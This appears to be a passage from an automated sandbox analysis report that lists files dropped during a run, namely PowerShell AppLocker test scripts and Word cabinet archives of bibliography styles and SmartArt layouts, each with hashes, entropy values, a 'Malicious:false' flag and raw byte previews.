                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg3bjmfl.lfx.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1x1zfms.bmp.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw0ycv1b.xu5.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2mbga32.10y.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\cabE370.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):34816
                                                                                    Entropy (8bit):7.840826397575377
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                    MD5:62863124CDCDA135ECC0E722782CB888
                                                                                    SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                    SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                    SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                                                                                    C:\Users\user\AppData\Local\Temp\cabE392.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):33610
                                                                                    Entropy (8bit):7.8340762758330476
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                    MD5:51804E255C573176039F4D5B55C12AB2
                                                                                    SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                    SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                    SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                    Malicious:false
                                                                                    Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3B3.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):19893
                                                                                    Entropy (8bit):7.592090622603185
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                    MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                    SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                    SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                    SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3B4.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):22149
                                                                                    Entropy (8bit):7.659898883631361
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                    MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                    SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                    SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                    SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                    Malicious:false
                                                                                    Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3D5.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):26944
                                                                                    Entropy (8bit):7.7574645319832225
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                    MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                    SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                    SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                    SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                    Malicious:false
                                                                                    Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3D6.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):20235
                                                                                    Entropy (8bit):7.61176626859621
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                    MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                    SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                    SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                    SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3E7.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):31471
                                                                                    Entropy (8bit):7.818389271364328
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                    MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                    SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                    SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                    SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3E8.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):31835
                                                                                    Entropy (8bit):7.81952379746457
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                    MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                    SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                    SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                    SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                    Malicious:false
                                                                                    Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3E9.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):31482
                                                                                    Entropy (8bit):7.808057272318224
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                    MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                    SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                    SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                    SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3FA.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):28911
                                                                                    Entropy (8bit):7.7784119983764715
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                    MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                    SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                    SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                    SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3FB.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):32833
                                                                                    Entropy (8bit):7.825460303519308
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                    MD5:205AF51604EF96EF1E8E60212541F742
                                                                                    SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                    SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                    SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                    Malicious:false
